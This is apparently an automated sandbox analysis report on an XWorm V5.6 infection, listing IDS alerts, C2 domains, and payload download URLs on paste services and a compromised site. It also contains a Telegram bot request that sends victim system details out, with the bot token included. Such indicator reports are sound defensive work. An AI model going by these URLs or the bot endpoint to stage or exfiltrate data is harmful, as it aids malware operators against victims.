Source: Network traffic	Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 178.73.218.6:7000 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.4:49749 -> 178.73.218.6:7000
Source: Network traffic	Suricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 178.73.218.6:7000 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49749 -> 178.73.218.6:7000
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49749 -> 178.73.218.6:7000
Source: Network traffic	Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:49747 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 64.235.43.128:443 -> 192.168.2.4:49740
Source: Network traffic	Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 64.235.43.128:443 -> 192.168.2.4:49740
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 64.235.43.128:443 -> 192.168.2.4:49740

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: moneyluckwork.ddns.net
Source: Malware configuration extractor	URLs: moneyluck.duckdns.org

Connects to a pastebin service (likely for C&C)

Source: unknown	DNS query: name: paste.ee
Source: unknown	DNS query: name: pastebin.com

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 191.252.83.213 ports 1,2,60964,60098,60391,21

Potential dropper URLs found in powershell memory

Source: powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp	String found in memory: content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp	String found in memory: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'

Uses dynamic DNS services

Source: unknown

DNS query: name: moneyluck.duckdns.org

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 32.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.powershell.exe.1558669b658.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 44.2.powershell.exe.1558669f3b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.177d903f890.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.1e6806fed08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.powershell.exe.177da235a08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.powershell.exe.1e6806fafa8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.20ece618be0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.powershell.exe.20ece614e80.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.powershell.exe.1de3d91b8a8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.powershell.exe.1de3d91f608.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 53.2.powershell.exe.1d3333dc4d0.1.raw.unpack, type: UNPACKEDPE

Source: global traffic	TCP traffic: 192.168.2.4:49731 -> 191.252.83.213:60098
Source: global traffic	TCP traffic: 192.168.2.4:49749 -> 178.73.218.6:7000

Source: global traffic	HTTP traffic detected: GET /d/I1o5h/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/Nbuiz/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/CPCMnN7k HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /X67h2024kNWORM.txt HTTP/1.1Host: masclauxtoitures.frConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/aGYNy/0 HTTP/1.1Host: paste.ee
Source: global traffic	HTTP traffic detected: GET /raw/GF0ptUGb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1F61296E2D13B1021028%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20WG6__62%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/GF0ptUGb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/GF0ptUGb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/GF0ptUGb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/GF0ptUGb HTTP/1.1Host: pastebin.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 104.20.3.235 104.20.3.235
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

ASN Name: PREMIANETUS PREMIANETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49745 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49735 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49732 -> 188.114.97.3:443

Source: unknown

FTP traffic detected: 191.252.83.213:21 -> 192.168.2.4:49730 220 "Servico de FTP da Locaweb"

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /d/I1o5h/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/Nbuiz/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/CPCMnN7k HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /X67h2024kNWORM.txt HTTP/1.1Host: masclauxtoitures.frConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/aGYNy/0 HTTP/1.1Host: paste.ee
Source: global traffic	HTTP traffic detected: GET /raw/GF0ptUGb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot6063212727:AAGxI15ihXd3ydfdlrCIMNDRzM08Ew5M1gY/sendMessage?chat_id=1188038887&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A1F61296E2D13B1021028%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20WG6__62%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/GF0ptUGb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/GF0ptUGb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/GF0ptUGb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/GF0ptUGb HTTP/1.1Host: pastebin.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: ftp.desckvbrat.com.br
Source: global traffic	DNS traffic detected: DNS query: paste.ee
Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: masclauxtoitures.fr
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: moneyluck.duckdns.org

Source: powershell.exe, 00000005.00000002.2336065211.000002B6B2AC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000005.00000002.2336065211.000002B6B2AC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000005.00000002.2334258140.000002B6B29B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2824594158.000001E6F71F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000010.00000002.1926571545.00000220D1494000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2824594158.000001E6F71F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2664986969.000001E6F4E75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 0000002C.00000002.2318654419.0000015584245000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftEO
Source: powershell.exe, 00000014.00000002.2002371682.0000020ECC1A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoftsl
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA44D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://desckvbrat.com.br
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA44D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA140000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.desckvbrat.com.br
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA574000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://masclauxtoitures.fr
Source: powershell.exe, 00000005.00000002.2087171202.000002B6AA552000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1977461538.0000024FF25A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3165334469.00000220E31E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3165334469.00000220E3327000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1930109525.00000220D4AEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://paste.ee
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA4F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013251264.0000020ECE7A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2070695014.000001E680887000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2195585060.000001DE3DAA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2333261639.0000015586829000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2425933120.000001D333568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000010.00000002.1930109525.00000220D33A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1896186167.000002B69A702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1895604908.0000024FE2752000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000004.00000002.1992997309.00000177D8CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1896186167.000002B69A4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1895604908.0000024FE2531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2087771963.00000182AAD91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1930109525.00000220D3171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013251264.0000020ECDFA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2070695014.000001E680048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2229713334.0000020922D98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2195585060.000001DE3D2A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2332458861.000001709AAC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2333261639.0000015585FE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2361827508.0000025F80084000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2496598586.000001628D0FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2425933120.000001D332D7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2666286370.000001D9870E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1896186167.000002B69A702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1895604908.0000024FE2752000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000010.00000002.1930109525.00000220D33A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000010.00000002.1926571545.00000220D1494000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2824594158.000001E6F71F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000005.00000002.2334258140.000002B6B29B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.i
Source: powershell.exe, 00000004.00000002.1992997309.00000177D8CC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1896186167.000002B69A4E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1895604908.0000024FE2531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2087771963.00000182AAD91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1930109525.00000220D3171000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013251264.0000020ECDF7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013251264.0000020ECDF69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2070695014.000001E68005E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2070695014.000001E68004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2229713334.0000020922D6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2229713334.0000020922D5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2195585060.000001DE3D27E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2195585060.000001DE3D269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2332458861.000001709AA8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2332458861.000001709AA9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2333261639.0000015585FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2333261639.0000015585FE4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2361827508.0000025F80033000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002E.00000002.2361827508.0000025F8005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2496598586.000001628D04E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000032.00000002.2496598586.000001628D03B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: powershell.exe, 00000014.00000002.2013251264.0000020ECE7E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013251264.0000020ECE53D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2070695014.000001E6808CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2070695014.000001E6805BB000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000020.00000002.2087880132.0000000000402000.00000040.00000400.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2195585060.000001DE3D7DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2195585060.000001DE3DAEF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2333261639.0000015586871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2333261639.000001558655B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2425933120.000001D3332B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2425933120.000001D3335B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000010.00000002.1930109525.00000220D4AEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.1930109525.00000220D4AEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.1930109525.00000220D4AEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: powershell.exe, 00000004.00000002.1992997309.00000177D9144000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA480000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA4A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D916E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D9130000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000010.00000002.1930109525.00000220D33A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000032.00000002.2496598586.000001628D6EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000003A.00000002.2666286370.000001D9875DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA574000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://masclauxtoitures.fr
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA574000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://masclauxtoitures.fr/X67h2024kNWORM.txt
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA574000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://masclauxtoitures.fr/X67h2024kNWORM.txtP
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA574000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://masclauxtoitures.fr/x67h2024knworm.txt
Source: powershell.exe, 00000005.00000002.2087171202.000002B6AA552000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1977461538.0000024FF25A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3165334469.00000220E31E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.3165334469.00000220E3327000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1930109525.00000220D4AEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.1992997309.00000177D91EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D8EE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee
Source: dll01.txt.3.dr	String found in binary or memory: https://paste.ee/d/I1o5h/0
Source: powershell.exe, 00000004.00000002.1992997309.00000177D8EE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA476000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177DA44D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/Nbuiz/0
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA476000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/Nbuiz/0P
Source: powershell.exe, 00000004.00000002.1992997309.00000177D91EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D91CE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/aGYNy/0
Source: powershell.exe, 00000004.00000002.1992997309.00000177D91EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/aGYNy/0P
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA4C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2013251264.0000020ECE788000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2070695014.000001E68086E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2195585060.000001DE3D7DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2195585060.000001DE3DAA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2333261639.0000015586824000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2333261639.000001558681C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2425933120.000001D33355A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2425933120.000001D333562000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA4C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw
Source: powershell.exe, 00000004.00000002.1992997309.00000177DA4C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1992997309.00000177D914C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/CPCMnN7k
Source: powershell.exe, 00000014.00000002.2013251264.0000020ECE53D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2070695014.000001E6805BB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2195585060.000001DE3D7DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002C.00000002.2333261639.0000015586710000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.2425933120.000001D3332B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/GF0ptUGb
